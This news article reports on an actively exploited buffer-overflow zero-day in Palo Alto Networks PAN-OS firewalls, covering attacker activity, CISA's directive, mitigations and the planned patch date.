TL;DR
A zero-day vulnerability in Palo Alto Networks PAN-OS firewalls has been exploited by suspected threat actors for nearly a month. The flaw allows remote code execution and has been linked to state-sponsored activity. Palo Alto is working on patches, and authorities have issued security directives.
Palo Alto Networks has confirmed that a critical zero-day vulnerability in its PAN-OS firewalls has been exploited by suspected state-sponsored hackers for nearly a month, with active attacks confirmed since early April. This security flaw, identified as CVE-2026-0300, allows attackers to execute arbitrary code remotely, posing a significant threat to organizations relying on these firewalls for network security.
The vulnerability resides in the PAN-OS User-ID Authentication Portal, also known as the Captive Portal, and stems from a buffer overflow flaw that enables unauthenticated remote code execution. Palo Alto Networks stated that limited exploitation was observed initially, but by April 16, attackers successfully compromised devices, deploying malicious shellcode. Following the breach, the attackers cleaned logs and deleted crash records to evade detection.
Post-compromise, the threat actors deployed open-source tools Earthworm and ReverseSocks5, which facilitate covert communication and bypass NAT/firewalls. Shadowserver has identified over 5,400 exposed PAN-OS VM-Series firewalls worldwide, with most in Asia and North America. Palo Alto Networks is preparing security patches, expected to be released on May 13, and advises customers to restrict access to the vulnerable portal until then.
Why It Matters
This development underscores the ongoing risks posed by zero-day vulnerabilities in network edge devices, which are often less protected and monitored. The exploitation by suspected state-sponsored actors highlights the potential for significant cyber-espionage or disruption, especially as firewalls are critical for organizational security. The incident also prompts urgent action from government agencies and private firms to update defenses and limit exposure.
Palo Alto Networks firewall security patch
As an affiliate, we earn on qualifying purchases.
As an affiliate, we earn on qualifying purchases.
Background
The vulnerability was discovered in the context of increased targeting of network perimeter devices by threat groups, including those linked to nation-states. Palo Alto Networks issued a security advisory and confirmed that the flaw does not impact other products like Cloud NGFW or Panorama. The attack pattern involves initial reconnaissance, followed by exploitation, log cleansing, and deployment of tunneling tools for persistent access. Authorities, including CISA, have added CVE-2026-0300 to their KEV catalog and mandated federal agencies to secure vulnerable devices by May 9.
“We are aware of limited exploitation of CVE-2026-0300 at this time. We are actively working on patches, which are scheduled for release on May 13.”
— Palo Alto Networks spokesperson
“We have added CVE-2026-0300 to the KEV catalog and ordered federal agencies to secure vulnerable firewalls by May 9.”
— CISA spokesperson
firewall zero-day vulnerability mitigation tools
As an affiliate, we earn on qualifying purchases.
As an affiliate, we earn on qualifying purchases.
What Remains Unclear
It remains unclear how widespread the exploitation is beyond the confirmed activity linked to specific threat groups, and whether additional vulnerabilities are being exploited in tandem. Details about the full scope of affected organizations and the specific attribution of the attackers are still emerging.
network security firewall hardware
As an affiliate, we earn on qualifying purchases.
As an affiliate, we earn on qualifying purchases.
What’s Next
Palo Alto Networks plans to release security patches on May 13, 2026. Organizations are advised to implement interim mitigation measures, such as restricting access to the User-ID Authentication Portal. Further investigations into the scope of the compromise and attribution are expected to continue, alongside efforts to improve detection and response capabilities.
firewall management and monitoring software
As an affiliate, we earn on qualifying purchases.
As an affiliate, we earn on qualifying purchases.
Key Questions
What is CVE-2026-0300?
CVE-2026-0300 is a critical remote code execution vulnerability in Palo Alto Networks PAN-OS firewalls’ User-ID Authentication Portal, caused by a buffer overflow flaw.
Who is exploiting this vulnerability?
Suspected state-sponsored threat groups are exploiting CVE-2026-0300, with activity confirmed since early April 2026.
What should organizations do now?
Organizations should restrict access to the vulnerable portal, monitor for unusual activity, and apply patches when they become available on May 13, 2026.
Are all Palo Alto firewalls affected?
No, only those running vulnerable versions of PAN-OS with the User-ID Authentication Portal enabled are affected. Other products like Cloud NGFW and Panorama are not impacted.
What tools did attackers deploy after compromising firewalls?
Attackers deployed open-source tools Earthworm and ReverseSocks5 to establish covert communication channels and bypass network defenses.
